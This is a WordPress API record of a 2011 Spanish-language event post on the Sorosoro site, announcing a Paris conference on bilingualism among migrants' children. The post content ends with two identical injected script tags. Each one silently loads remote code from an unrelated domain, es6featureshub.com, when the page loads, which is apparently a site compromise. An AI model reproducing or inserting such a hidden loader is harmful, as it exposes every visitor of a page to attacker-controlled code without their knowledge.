{"id":47554,"date":"2011-05-16T00:01:43","date_gmt":"2011-05-15T22:01:43","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=47554"},"modified":"2025-10-21T22:50:00","modified_gmt":"2025-10-21T20:50:00","slug":"16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/","title":{"rendered":"16 de mayo de 2011: conferencia intitulada \u00ab Reconocer el biling\u00fcismo de los hijos de migrantes: \u00bfuna ventaja para la integraci\u00f3n? \u00bb, Paris"},"content":{"rendered":"<p style=\"text-align: justify;\">La asociaci\u00f3n <em><strong>De una Lengua a la Otra<\/strong><\/em> tiene como objetivo <a href=\"http:\/\/blog.sorosoro.org\/es\/la-asistencia-a-familias-multilingues\">promover el multiling\u00fcismo y ayudar a las familias salidas de la inmigraci\u00f3n a que transmitan a sus ni\u00f1os su lengua y su cultura<\/a>, paralelamente a la educaci\u00f3n que reciben en franc\u00e9s. Su fundadora, la ling\u00fcista <strong>Anna Stevanato<\/strong>, ya tuvo la oportunidad de explicar estas acciones en el marco de nuestro blog.<\/p>\n<p style=\"text-align: justify;\">A todos aqu\u00e9llos que se interesen por estas tem\u00e1ticas del multiling\u00fcismo y de la integraci\u00f3n podr\u00e1n encontrarla con motivo de una conferencia organizada por la asociaci\u00f3n el 16 de mayo en Par\u00eds, una conferencia intitulada \u00ab<strong>Reconocer el biling\u00fcismo de los ni\u00f1os de emigrantes: \u00bfuna ventaja para la integraci\u00f3n?<\/strong>\u00bb.<\/p>\n<p style=\"text-align: justify;\">Organizada con el concurso del Ministerio de la Cultura y del Consejo Regional, esta conferencia, que se llevar\u00e1 a cabo bajo el patrocinio de <strong>Amin Maalouf<\/strong>, reunir\u00e1 a varios otros interventores, tales como Michel Rabaud, ling\u00fcista, Sou\u00e2d Belhaddad, periodista y fundadora de <em>Ciudadan\u00eda Posible<\/em>, y Michel Alessio del Ministerio de la Cultura (Delegaci\u00f3n general a la lengua francesa y a las lenguas de Francia).<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.dunelanguealautre.org\/\" target=\"_blank\">Para mayores informes<\/a><\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><em>Lunes 16 de mayo de las 6:30 a las 8:30 pm<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Au Comptoir G\u00e9n\u00e9ral<\/em><\/p>\n<p style=\"text-align: justify;\"><em>80 muelle des Jemmapes,<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Par\u00eds 10\u00b0 distrito<\/em><\/p>\n<p style=\"text-align: justify;\"><em>(Metro R\u00e9publique)<\/em><\/p>\n<p style=\"text-align: justify;\">\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La asociaci\u00f3n De una Lengua a la Otra tiene como objetivo promover el multiling\u00fcismo y ayudar a las familias salidas de la inmigraci\u00f3n a que transmitan a sus ni\u00f1os su lengua y su cultura, paralelamente a la educaci\u00f3n que reciben en franc\u00e9s. Su fundadora, la ling\u00fcista Anna Stevanato, ya tuvo la oportunidad de explicar estas [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-47554","post","type-post","status-publish","format-standard","hentry","category-calendario"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>16 de mayo de 2011: conferencia intitulada \u00ab Reconocer el biling\u00fcismo de los hijos de migrantes: \u00bfuna ventaja para la integraci\u00f3n? \u00bb, Paris - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"16 de mayo de 2011: conferencia intitulada \u00ab Reconocer el biling\u00fcismo de los hijos de migrantes: \u00bfuna ventaja para la integraci\u00f3n? \u00bb, Paris - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"La asociaci\u00f3n De una Lengua a la Otra tiene como objetivo promover el multiling\u00fcismo y ayudar a las familias salidas de la inmigraci\u00f3n a que transmitan a sus ni\u00f1os su lengua y su cultura, paralelamente a la educaci\u00f3n que reciben en franc\u00e9s. Su fundadora, la ling\u00fcista Anna Stevanato, ya tuvo la oportunidad de explicar estas [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-05-15T22:01:43+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:50:00+00:00\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"16 de mayo de 2011: conferencia intitulada \u00ab Reconocer el biling\u00fcismo de los hijos de migrantes: \u00bfuna ventaja para la integraci\u00f3n? \u00bb, Paris\",\"datePublished\":\"2011-05-15T22:01:43+00:00\",\"dateModified\":\"2025-10-21T20:50:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/\"},\"wordCount\":240,\"articleSection\":[\"Calendario\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/\",\"name\":\"16 de mayo de 2011: conferencia intitulada \u00ab Reconocer el biling\u00fcismo de los hijos de migrantes: \u00bfuna ventaja para la integraci\u00f3n? \u00bb, Paris - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"datePublished\":\"2011-05-15T22:01:43+00:00\",\"dateModified\":\"2025-10-21T20:50:00+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"16 de mayo de 2011: conferencia intitulada \u00ab Reconocer el biling\u00fcismo de los hijos de migrantes: \u00bfuna ventaja para la integraci\u00f3n? \u00bb, Paris\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"16 de mayo de 2011: conferencia intitulada \u00ab Reconocer el biling\u00fcismo de los hijos de migrantes: \u00bfuna ventaja para la integraci\u00f3n? \u00bb, Paris - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/","og_locale":"es_ES","og_type":"article","og_title":"16 de mayo de 2011: conferencia intitulada \u00ab Reconocer el biling\u00fcismo de los hijos de migrantes: \u00bfuna ventaja para la integraci\u00f3n? \u00bb, Paris - Sorosoro","og_description":"La asociaci\u00f3n De una Lengua a la Otra tiene como objetivo promover el multiling\u00fcismo y ayudar a las familias salidas de la inmigraci\u00f3n a que transmitan a sus ni\u00f1os su lengua y su cultura, paralelamente a la educaci\u00f3n que reciben en franc\u00e9s. Su fundadora, la ling\u00fcista Anna Stevanato, ya tuvo la oportunidad de explicar estas [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/","og_site_name":"Sorosoro","article_published_time":"2011-05-15T22:01:43+00:00","article_modified_time":"2025-10-21T20:50:00+00:00","author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Michel.Lemee","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"16 de mayo de 2011: conferencia intitulada \u00ab Reconocer el biling\u00fcismo de los hijos de migrantes: \u00bfuna ventaja para la integraci\u00f3n? \u00bb, Paris","datePublished":"2011-05-15T22:01:43+00:00","dateModified":"2025-10-21T20:50:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/"},"wordCount":240,"articleSection":["Calendario"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/","url":"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/","name":"16 de mayo de 2011: conferencia intitulada \u00ab Reconocer el biling\u00fcismo de los hijos de migrantes: \u00bfuna ventaja para la integraci\u00f3n? \u00bb, Paris - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"datePublished":"2011-05-15T22:01:43+00:00","dateModified":"2025-10-21T20:50:00+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/16-de-mayo-de-2011-conferencia-intitulada-reconocer-el-bilinguismo-de-los-hijos-de-migrantes-una-ventaja-para-la-integracion-paris\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"16 de mayo de 2011: conferencia intitulada \u00ab Reconocer el biling\u00fcismo de los hijos de migrantes: \u00bfuna ventaja para la integraci\u00f3n? \u00bb, Paris"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/47554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=47554"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/47554\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=47554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=47554"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=47554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}